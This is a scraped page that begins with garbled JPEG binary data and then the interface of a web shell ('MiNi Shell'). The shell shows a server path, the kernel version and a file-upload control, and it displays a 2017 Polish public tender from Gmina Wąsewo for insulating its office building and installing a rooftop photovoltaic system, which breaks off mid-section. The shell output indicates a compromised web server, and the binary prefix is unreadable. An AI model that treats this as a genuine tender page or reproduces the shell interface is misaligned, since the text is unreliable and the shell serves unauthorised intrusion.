JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170413/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170413/65682-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.wasewo.pl/zamowienia-publiczne.html' target='_blank'>http://www.wasewo.pl/zamowienia-publiczne.html</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 65682 - 2017
              z dnia 2017-04-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Wąsewo: Termomodernizacja budynku Urzędu Gminy Wąsewo <br />
            OGŁOSZENIE O ZAMÓWIENIU -
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              nieobowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                tak
              </div><br /><b>Nazwa projektu lub programu</b><br />Zamówienie jest współfinansowane z Europejskiego Funduszu Rozwoju Regionalnego w ramach Osi Priorytetowej RPO WM IV Przejście na gospodarkę niskoemisyjną, Działania 4.2 Efektywność energetyczna, Typ projektów: Termomodernizacja budynków użyteczności publicznej. </div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Wąsewo, krajowy numer identyfikacyjny
              550667899, ul.
              ul. Zastawska 
              13,
              07-311  
              Wąsewo, woj.
              mazowieckie, państwo
              Polska, tel.
              296 458 000, e-mail
              wasewo@pro.onet.pl, faks
              296 458 001.
              <br />
              Adres strony internetowej (URL): http://www.wasewo.pl/<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://www.wasewo.pl/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://www.wasewo.pl/zamowienia-publiczne.html</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie w zamkniętej kopercie<br />
                Adres:
                <br />Urząd Gminy Wąsewo, ul. Zastawska 13,07-311 Wąsewo sekretariat pok. nr 6</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Termomodernizacja budynku Urzędu Gminy Wąsewo <br /><b>Numer referencyjny: </b>AW.271.1.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b><br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiot zamówienia składa się z dwóch części:
Część I -  Termomodernizacja budynku Urzędu Gminy Wąsewo w zakres, którego wchodzą zadania polegające na: dociepleniu stropu nad piętrem budynku, dociepleniu ścian zewnętrznych, wymianie stolarki drzwiowej, wymianie oświetlenia led, wymianie pokrycia dachowego, roboty budowlane związane z kanalizacją deszczową, kominem ze stali kwasoodpornej oraz remontem sali konferencyjnej.
Część II -  Termomodernizacja budynku Urzędu Gminy Wąsewo, w zakres, którego wchodzą zadania polegające na: zaprojektowaniu i zrealizowaniu dostawy, montażu i uruchomieniu instalacji fotowoltaicznej o mocy ok. 4 kWp na dachu budynku Urzędu Gminy w Wąsewie.

Wykonanie prac zgodnie z wymaganiami i informacjami opisanymi przez zamawiającego i zawartymi w Programie Funkcjonalno-Użytkowym (PFU), dla zaprojektowania i wykonania budowy oraz uruchomieniu instalacji w zakresie Części II. 

Szczegółowy opis przedmiotu Zamówienia stanowi dokumentacja projektowa i specyfikacja techniczna wykonania i odbioru robót (STWiOR), Audyt Energetyczny, przedmiar robót (element pomocniczy), SIWZ, projekt umowy<br /><br /><b>II.5) Główny kod CPV: </b>45000000-7<br /><b> Dodatkowe kody CPV:</b>71200000-0,
                71300000-1,
                71314100-3,
                71320000-7,
                71321000-4,
                71326000-9,
                45300000-0,
                44112410-5,
                45310000-3,
                45231000-5,
                45261215-4,
                45453000-7,
                45421000-4,
                45350000-5,
                45330000-9,
                45320000-6,
                45331210-1,
                71000000-8<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 13/08/2017<br /></div><br /><b>II.9) Informacje dodatkowe: </b>Wykaz dokumentacji branży budowlanej, elektrycznej i sanitarnej:
1.Projekt Budowlany - część 1 przedmiotu zamówienia, 
2.Audyt Energetyczny - część 1, część 2 przedmiotu zamówienia,
3.Przedmiary robót - część 1 przedmiotu zamówienia,
4.Program Funkcjonalno-Użytkowy  część 2 przedmiotu zamówienia.</div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisywania sposobu dokonywania oceny spełniania tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający odstępuje od opisywania sposobu dokonywania oceny spełniania tego warunku<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)doświadczenia wykonawcy: 
w zakresie CZĘŚCI I:
- 1 robotę budowlaną, która odpowiadała swoim rodzajem przedmiotowi zamówienia, tj. polegająca na termomodernizacji budynku (przez termomodernizację Zamawiający rozumie m in. wymianę pokrycia dachów, docieplenie dachów, stropodachów, ścian budynków, wymianę stolarki drzwiowej, modernizację instalacji c.o., modernizacji instalacji oświetlenia itp.) o wartości minimum 450.000,00 zł brutto (każda).
Wykonawca złoży także oświadczenie, że dysponuje wiedzą i doświadczeniem potrzebnym do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr 2 do SIWZ. Następnie na podstawie wypełnionego przez wybranego Wykonawcę załącznika nr 9 do SIWZ Wykazu wykonanych robót. Do przedmiotowego załącznika nr 9 należy dołączyć dowody potwierdzające, że wykazane roboty zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. W przypadku składania oferty na więcej niż jedną część Wykonawca wykazuje doświadczenie w zakresie jednego zadania i wykaz składa tylko raz. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że chociaż jeden z nich lub łącznie spełniają w/w warunek. 

w zakresie CZĘŚCI II:
-  udokumentuje wykonanie w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie minimum dwóch robót budowlanych polegających na wykonaniu instalacji fotowoltaicznej             o mocy min. 4 kWp oraz wartości nie mniejszej niż 30.000,00 zł brutto (każda);
Wykonawca złoży także oświadczenie, że dysponuje wiedzą i doświadczeniem potrzebnym do wykonania zamówienia. Ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie z Załącznikiem nr 2 do SIWZ. Następnie na podstawie wypełnionego przez wybranego Wykonawcę załącznika nr 9 do SIWZ Wykazu wykonanych robót. Do przedmiotowego załącznika nr 9 należy dołączyć dowody potwierdzające, że wykazane roboty zostały wykonane w sposób należyty oraz wskazujących, że zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone. W przypadku składania oferty na więcej niż jedną część Wykonawca wykazuje doświadczenie w zakresie jednego zadania i wykaz składa tylko raz. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że chociaż jeden z nich lub łącznie spełniają w/w warunek

b)potencjału technicznego, 
Zamawiający odstępuje od opisywania sposobu dokonywania oceny spełniania tego warunku

c)potencjału osób skierowanych przez wykonawcę do realizacji zamówienia;

- dotyczy części I 
Kierownikiem robót w specjalności konstrukcyjno-budowlanej, pełniący jednocześnie rolę kierownika budowy. 
Minimalne wymagania: osoba posiadająca uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności konstrukcyjno-budowlanej lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia. 
Doświadczenie zawodowe w realizacji co najmniej 1 zadania o wartości zadania minimum 450.000,00 zł. brutto, obejmującego termomodernizację, na stanowisku Kierownika Budowy lub Inspektora Nadzoru w specjalności konstrukcyjno-budowlanej .

Kierownikiem robót w specjalności sanitarnej. 
Minimalne wymagania: osoba posiadająca uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia oraz posiadająca min. 3  letnie doświadczenie.

- dotyczy części II
Kierownikiem robót w specjalności elektroenergetycznej pełniący jednocześnie rolę kierownika budowy.
Minimalne wymagania: osoba posiadająca uprawnienia do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych lub inne uprawnienia umożliwiające wykonywanie tych samych czynności, do wykonywania, których w aktualnym stanie prawnym uprawniają uprawnienia budowlane w/w specjalności umożliwiające zrealizowanie przedmiotowego zamówienia oraz posiadająca min. 3 letnie doświadczenie na stanowisku kierownika budowy lub robót.

Doświadczenie zawodowe w realizacji co najmniej 1 zadania o wartości zadania minimum 30.000,00 zł. brutto, obejmującego budowę instalacji fotowoltaicznej, na stanowisku Kierownika Budowy lub Inspektora Nadzoru w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych .

Wykonawca wykaże, że dysponuje lub będzie dysponował co najmniej jedną osobą posiadającą ważny certyfikat instalatora OZE wystawiony przez Prezesa Urzędu Dozoru Technicznego w zakresie instalacji fotowoltaicznych.

W przypadku składania oferty przez wykonawcę na więcej niż jedną część zamawiający informuje, że potencjałem kadrowym należy wykazać się tylko raz tj. wykonawca składa jeden wykaz osób.
Ocena spełniania warunku nastąpi na podstawie wstępnego oświadczenia zgodnie                           z Załącznikiem nr 2 do SIWZ. Następnie na podstawie wypełnionego przez wybranego Wykonawcę Załącznika nr 10 do SIWZ. 

Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz odpowiadające uprawnienia wydane obywatelom państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej oraz państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA) - strony umowy o Europejskim Obszarze Gospodarczym z zastrzeżeniem art. 12a oraz innych przepisów Prawo budowlane oraz ustawy o zasadach uznania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej, wówczas wykonawca na własny koszt zapewni tłumacza języka polskiego, który zapewni stałe i biegłe tłumaczenie w kontaktach pomiędzy Zamawiającym a Wykonawcą, a także zapewni tłumaczenie na bieżąco wszystkich dokumentów związanych z realizacją przedmiotowego zamówienia stworzonych zarówno przez Wykonawcę, jak i dostarczonych przez Zamawiającego. Wykonawca zatrudniając tłumacza winien wziąć pod uwagę, iż z uwagi na złożony zakres przedmiotu zamówienia tłumacz ten winien być biegłym w tłumaczeniu zagadnień technicznych, ekonomicznych i prawnych. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że co najmniej jeden z nich lub albo wszyscy łącznie spełniają w/w warunek. 
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">-aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt. 1 ustawy, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
-lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 1 pkt 23 ustawy Pzp. W przypadku przynależności do grupy kapitałowej wraz z oświadczeniem, Wykonawca złoży listę podmiotów należących do tej samej grupy kapitałowej oraz może przedstawić dowody, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu o udzielenie zamówienia. Dokument ten należy złożyć w oryginale. Załącznik nr 4 do SIWZ.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />a) wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju i wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty te zostały wykonane lub są wykonywane należycie oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie , w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty  tj.; 
Część I:
 -  1 robotę budowlaną, która odpowiada swoim rodzajem przedmiotowi zamówienia, tj. polegającą na termomodernizacji budynku o wartości minimum 450.000,00 zł brutto (każda)  załącznik nr 9 do SIWZ;
Część II:
-  udokumentowanie wykonania w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie minimum dwóch robót budowlanych polegających na wykonaniu instalacji fotowoltaicznej o mocy min. 4 kWp oraz wartości nie mniejszej niż 30.000,00 zł brutto (każda) załącznik nr 9 do SIWZ; 

b) wykaz osób, kierowanych przez Wykonawcę do realizacji zamówienia publicznego,w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacji o podstawie do dysponowania tymi osobami wraz z oświadczeniem, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, jeśli Wykonawca wykaże, iż dysponuje personelem zdolnym do wykonania zamówienia, tj.:
Część I:
- min. 1 osobą która będzie kierownikiem budowy posiadającą wykształcenie wyższe i uprawnienia do kierowania robotami budowlanymi bez ograniczeń w branży konstrukcyjno-budowlanej załącznik nr 10 do SIWZ, 
- min 1 osobą która będzie kierownikiem robót w specjalności sanitarnej załącznik nr 10 do SIWZ, 
Część II:
- min 1 osobą która będzie kierownikiem robót w specjalności elektroenergetycznej  załącznik nr 10 do SIWZ,
- wskazanie jednej osoby posiadającej ważny certyfikat instalatora OZE wystawionego przez Prezesa Urzędu Dozoru Technicznego w zakresie instalacji fotowoltaicznych. 
<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px">a) wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy  w tym okresie, wraz z podaniem ich rodzaju i wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty te zostały wykonane lub są wykonywane należycie oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie , w szczególności informacje o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów  inne dokumenty  tj.; 
Część I:
